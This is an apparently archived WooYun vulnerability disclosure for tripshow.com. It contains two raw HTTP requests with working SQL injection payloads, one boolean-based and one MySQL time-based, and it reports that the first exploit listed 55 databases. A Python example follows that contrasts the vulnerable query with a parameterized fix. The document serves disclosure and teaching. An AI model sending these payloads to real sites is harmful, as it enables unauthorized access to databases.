WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-09-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-03: The vendor has actively ignored the vulnerability; details disclosed to the public.
#1
POST /weiboapp/73/processor HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

action=get_imglist&id=756505%20AND%203*2*1%3d6%20AND%20187%3d187&img_types=2&page=2

Injection point: POST parameter id. URL-decoded, the value is 756505 AND 3*2*1=6 AND 187=187, a boolean-based probe: the appended tautology must not change the response, which shows the parameter is being evaluated as SQL.
#2
POST /products/brandpages/open HTTP/1.1
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://tripshow.com:80/
Cookie: PHPSESSID=5gdueeiomurk8pds0rab7og981; backurl=%2Fpictures%2Fshow%2Fnull; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2Ftripshow.com%2F; todaysidck=55fa83900f447; referer=http%3A%2F%2Ftripshow.com%2F5343689283%2Fmyself; weiboapp_login_backurl=%2Fweiboapp%2F88%2F%3Fact%3D; __utmt=1; __utma=268593204.163940433.1442481527.1442481527.1442481527.1; __utmb=268593204.7.10.1442481527; __utmc=268593204; __utmz=268593204.1442481527.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442481529%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f79d3e775f458bcc.1442481529.1.1442484501.1442481529.; _pk_ses.1.07eb=*; _ga=GA1.2.962798704.1442481533; _gat=1; 2014_show=question; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442482897,1442483323,1442484256,1442484749; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442484749; HMACCOUNT=F1B3AFC580D0BFE1; 2014_goto=http%3A//tripshow.com/campaign/newyear/activity/1756852%23to6
Host: tripshow.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

address=3137%20Laguna%20Street&AgencyTypes=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&description=1&email=sample%40email.tst&location=1&tel=555-666-0606&url=1&VersionID=1

Injection point: POST parameter AgencyTypes. URL-decoded, the value is if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/, a MySQL time-based probe that covers an unquoted, a single-quoted and a double-quoted context in one payload; with sleep(0) replaced by a real delay, the response time reveals whether the expression was executed.
Ran the first injection point as proof: 55 databases.
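The inference behind the first payload (id=756505 AND 3*2*1=6 AND 187=187), shown as an added example that is not code from the original report or from tripshow.com. It models the get_imglist endpoint with an in-memory SQLite table: the table layout, the function names, the sample rows and the fact that the real application concatenates the parameter into its query are all assumptions made here. The vulnerable form is placed beside a hardened one that validates the type and binds the value as a parameter, and a small probe applies the report's tautology/contradiction pair to both.

```python
import sqlite3

# Constructed sample data standing in for the image table behind
# /weiboapp/73/processor; not taken from the target.
SAMPLE_ROWS = [
    (1, 756505, "a.jpg"),
    (2, 756505, "b.jpg"),
    (3, 99, "c.jpg"),
]


def make_db():
    """Build an in-memory database with the assumed images table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER, item_id INTEGER, path TEXT)")
    conn.executemany("INSERT INTO images VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def get_imglist_vulnerable(conn, item_id):
    """Assumed bug pattern: the request parameter is concatenated straight into
    the WHERE clause, so a tail such as ' AND 3*2*1=6 AND 187=187' is parsed
    as SQL instead of being compared as a value."""
    sql = "SELECT path FROM images WHERE item_id = " + item_id + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def get_imglist_fixed(conn, item_id):
    """Hardened form: enforce the integer type the endpoint expects, then bind
    the value as a parameter so the payload never reaches the SQL parser."""
    if not item_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    rows = conn.execute(
        "SELECT path FROM images WHERE item_id = ? ORDER BY id", (int(item_id),)
    )
    return [row[0] for row in rows]


def looks_injectable(conn, fetch, base_id):
    """Boolean-based probe in the style of the report's first payload.
    A tautology appended to the value must leave the result set unchanged and
    a contradiction must empty it; when both hold, the parameter is being
    evaluated as SQL. Input rejected before any query runs counts as not
    injectable."""
    try:
        baseline = fetch(conn, base_id)
        with_true = fetch(conn, base_id + " AND 3*2*1=6 AND 187=187")
        with_false = fetch(conn, base_id + " AND 3*2*1=7 AND 187=187")
    except ValueError:
        return False
    return bool(baseline) and with_true == baseline and with_false == []


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", looks_injectable(db, get_imglist_vulnerable, "756505"))
    print("fixed:     ", looks_injectable(db, get_imglist_fixed, "756505"))
```

The second payload works on the same principle with response time instead of response content: if(now()=sysdate(),sleep(N),0) only delays the reply when MySQL actually evaluates it. SQLite has no sleep(), so that variant is not run here, but the fix is the same: type validation plus parameter binding, which leaves nothing for the XOR/comment-wrapped branches of the payload to attach to.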
Vendor could not be reached, or the vendor actively declined.